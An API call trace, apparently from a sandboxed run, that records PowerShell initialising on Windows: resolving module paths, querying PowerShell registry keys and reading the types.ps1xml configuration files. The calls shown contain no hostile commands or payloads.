	[0404.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d180, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.099] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0405.101] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0405.101] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0405.101] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0405.103] CoTaskMemAlloc (cb=0xcc) returned 0x1b89de20
	[0405.103] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b89de20, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0405.103] CoTaskMemFree (pv=0x1b89de20) 
	[0405.103] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d8a8 | out: phkResult=0x20d8a8*=0x320) returned 0x0
	[0405.103] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d82c, lpData=0x0, lpcbData=0x20d828*=0x0 | out: lpType=0x20d82c*=0x2, lpData=0x0, lpcbData=0x20d828*=0x6c) returned 0x0
	[0405.103] CoTaskMemAlloc (cb=0x70) returned 0x2f59d0
	[0405.103] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d7fc, lpData=0x2f59d0, lpcbData=0x20d7f8*=0x6c | out: lpType=0x20d7fc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x20d7f8*=0x6c) returned 0x0
	[0405.103] CoTaskMemFree (pv=0x2f59d0) 
	[0405.103] CoTaskMemAlloc (cb=0xcc) returned 0x1b89de20
	[0405.103] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b89de20, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0405.104] CoTaskMemFree (pv=0x1b89de20) 
	[0405.104] CoTaskMemAlloc (cb=0xcc) returned 0x1b89de20
	[0405.104] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b89de20, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0405.104] CoTaskMemFree (pv=0x1b89de20) 
	[0405.107] RegCloseKey (hKey=0x320) returned 0x0
	[0405.107] CoTaskMemAlloc (cb=0xcc) returned 0x1b89de20
	[0405.107] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b89de20, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0405.107] CoTaskMemFree (pv=0x1b89de20) 
	[0405.108] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d8a8 | out: phkResult=0x20d8a8*=0x320) returned 0x0
	[0405.108] RegQueryValueExW (in: hKey=0x320, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x20d82c, lpData=0x0, lpcbData=0x20d828*=0x0 | out: lpType=0x20d82c*=0x0, lpData=0x0, lpcbData=0x20d828*=0x0) returned 0x2
	[0405.108] RegCloseKey (hKey=0x320) returned 0x0
	[0405.111] CoTaskMemAlloc (cb=0x20c) returned 0x34a210
	[0405.112] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x34a210 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0405.113] CoTaskMemFree (pv=0x34a210) 
	[0405.113] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x20d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0405.114] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0405.527] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0405.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.528] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0405.530] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0405.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.530] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0405.533] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0405.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.533] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0405.533] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0405.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.534] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0405.535] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d698 | out: phkResult=0x20d698*=0x1c0) returned 0x0
	[0405.536] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x20d6ac, lpData=0x0, lpcbData=0x20d6a8*=0x0 | out: lpType=0x20d6ac*=0x1, lpData=0x0, lpcbData=0x20d6a8*=0x74) returned 0x0
	[0405.537] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x20d61c, lpData=0x0, lpcbData=0x20d618*=0x0 | out: lpType=0x20d61c*=0x1, lpData=0x0, lpcbData=0x20d618*=0x74) returned 0x0
	[0405.537] CoTaskMemAlloc (cb=0x78) returned 0x2f59d0
	[0405.537] RegQueryValueExW (in: hKey=0x1c0, lpValueName="path", lpReserved=0x0, lpType=0x20d5ec, lpData=0x2f59d0, lpcbData=0x20d5e8*=0x74 | out: lpType=0x20d5ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x20d5e8*=0x74) returned 0x0
	[0405.537] CoTaskMemFree (pv=0x2f59d0) 
	[0405.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x20d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0405.537] SetErrorMode (uMode=0x1) returned 0x1
	[0405.538] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x20d570 | out: lpFileInformation=0x20d570*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0405.538] SetErrorMode (uMode=0x1) returned 0x1
	[0405.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0405.540] SetErrorMode (uMode=0x1) returned 0x1
	[0405.540] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d570 | out: lpFileInformation=0x20d570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0405.540] SetErrorMode (uMode=0x1) returned 0x1
	[0405.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0405.545] SetErrorMode (uMode=0x1) returned 0x1
	[0405.545] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d570 | out: lpFileInformation=0x20d570*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0405.545] SetErrorMode (uMode=0x1) returned 0x1
	[0405.549] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0405.549] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.549] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0405.996] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad1e0
	[0405.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad1e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0405.996] CoTaskMemFree (pv=0x1b8ad1e0) 
	[0405.997] GetACP () returned 0x4e4
	[0406.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.006] SetErrorMode (uMode=0x1) returned 0x1
	[0406.007] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c4
	[0406.008] GetFileType (hFile=0x1c4) returned 0x1
	[0406.008] SetErrorMode (uMode=0x1) returned 0x1
	[0406.008] GetFileType (hFile=0x1c4) returned 0x1
	[0406.012] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e0f048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f048*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.014] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e0f048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f048*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.015] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e0f048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f048*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.015] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e0f048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f048*, lpNumberOfBytesRead=0x20d4a8*=0xcf3, lpOverlapped=0x0) returned 1
	[0406.015] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e0e4a3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2e0e4a3*, lpNumberOfBytesRead=0x20d4a8*=0x0, lpOverlapped=0x0) returned 1
	[0406.015] ReadFile (in: hFile=0x1c4, lpBuffer=0x2e0f048, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2e0f048*, lpNumberOfBytesRead=0x20d4a8*=0x0, lpOverlapped=0x0) returned 1
	[0406.018] CloseHandle (hObject=0x1c4) returned 1
	[0406.021] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.022] SetErrorMode (uMode=0x1) returned 0x1
	[0406.022] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x20d420 | out: lpFileInformation=0x20d420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0406.022] SetErrorMode (uMode=0x1) returned 0x1
	[0406.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.023] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x20d508 | out: phkResult=0x20d508*=0x1c4) returned 0x0
	[0406.023] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d48c, lpData=0x0, lpcbData=0x20d488*=0x0 | out: lpType=0x20d48c*=0x1, lpData=0x0, lpcbData=0x20d488*=0x56) returned 0x0
	[0406.023] CoTaskMemAlloc (cb=0x5a) returned 0x1b8a69b0
	[0406.023] RegQueryValueExW (in: hKey=0x1c4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x20d45c, lpData=0x1b8a69b0, lpcbData=0x20d458*=0x56 | out: lpType=0x20d45c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x20d458*=0x56) returned 0x0
	[0406.023] CoTaskMemFree (pv=0x1b8a69b0) 
	[0406.023] RegCloseKey (hKey=0x1c4) returned 0x0
	[0406.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.024] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x20d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0406.412] GetSystemInfo (in: lpSystemInfo=0x20c140 | out: lpSystemInfo=0x20c140*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0406.413] VirtualQuery (in: lpAddress=0x20c1f0, lpBuffer=0x20d0b0, dwLength=0x30 | out: lpBuffer=0x20d0b0*(BaseAddress=0x20c000, AllocationBase=0x190000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0406.775] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x20cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0406.776] SetErrorMode (uMode=0x1) returned 0x1
	[0406.776] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c0
	[0406.776] GetFileType (hFile=0x1c0) returned 0x1
	[0406.776] SetErrorMode (uMode=0x1) returned 0x1
	[0406.776] GetFileType (hFile=0x1c0) returned 0x1
	[0406.776] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.776] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.776] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.777] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.777] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.777] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.777] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.777] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.777] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.778] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.778] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.778] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.779] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.779] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.779] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
	[0406.779] ReadFile (in: hFile=0x1c0, lpBuffer=0x2d09268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x20d4a8, lpOverlapped=0x0 | out: lpBuffer=0x2d09268*, lpNumberOfBytesRead=0x20d4a8*=0x1000, lpOverlapped=0x0) returned 1
